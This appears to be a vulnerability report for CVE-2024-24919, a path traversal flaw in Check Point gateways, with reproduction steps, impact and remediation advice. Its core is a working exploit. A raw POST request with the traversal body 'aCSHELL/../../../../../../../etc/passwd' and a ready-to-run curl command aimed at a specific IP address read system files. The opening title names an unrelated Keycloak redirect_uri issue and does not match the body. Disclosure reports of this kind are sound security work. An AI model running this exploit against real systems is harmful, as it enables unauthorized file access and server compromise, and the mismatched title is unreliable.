Keycloak's redirect_uri validation logic. (Check-point CVE-2024-24919)
Check-point CVE-2024-24919 allow unauthorized user to read internal files
Vulnerability Summary:
A critical path traversal vulnerability (CVE-2024-24919) has been identified on the server hosted at example.com. This vulnerability allows an attacker to access sensitive files on the server, including the /etc/passwd file, which can lead to unauthorized access and potential system compromise.
Steps to Reproduce:
To reproduce the vulnerability, follow these steps:
1. Visit the website: https://example.com/
2. Navigate to the path /clients/MyCRL and intercept the request using a third-party proxy tool (e.g., Burp Suite).
3. Send the intercepted request to the repeater.
4. Modify the request method to POST and enter the following payload in request body : aCSHELL/../../../../../../../etc/passwd.
The modified request should look like this:
POST /clients/MyCRL HTTP/1.1
Host: example.com
Content-Length: 39
aCSHELL/../../../../../../../etc/passwd
//also you can do this by simple curl command just change the ip address of host and url:
curl --path-as-is -i -s -k -X $'POST' \
-H $'Host: 212.179.13.8' -H $'Content-Length: 39' -H $'Connection: keep-alive' \
--data-binary $'aCSHELL/../../../../../../../etc/passwd' \
$'https://212.179.13.8/clients/MyCRL'
Impact:
This vulnerability allows attackers to perform directory traversal attacks, accessing sensitive files on the server. Specifically, by accessing the /etc/passwd file, attackers can obtain information about system users, which can be leveraged to further compromise the system. This could lead to:
* Unauthorized access
* Data breaches
* Potential control over the affected server
Recommendation:
It is crucial to address this vulnerability immediately to prevent any exploitation. I recommend that the server administrators take the following steps:
1. Patch the vulnerability as soon as possible.
2. Implement additional security measures to prevent directory traversal attacks.
3. Conduct a thorough security audit to identify and remediate any other potential vulnerabilities.
By addressing this vulnerability, you can prevent unauthorized access and potential system compromise, ensuring the security and integrity of your server and data.
Please let us know if you need any further assistance or clarification regarding this vulnerability.
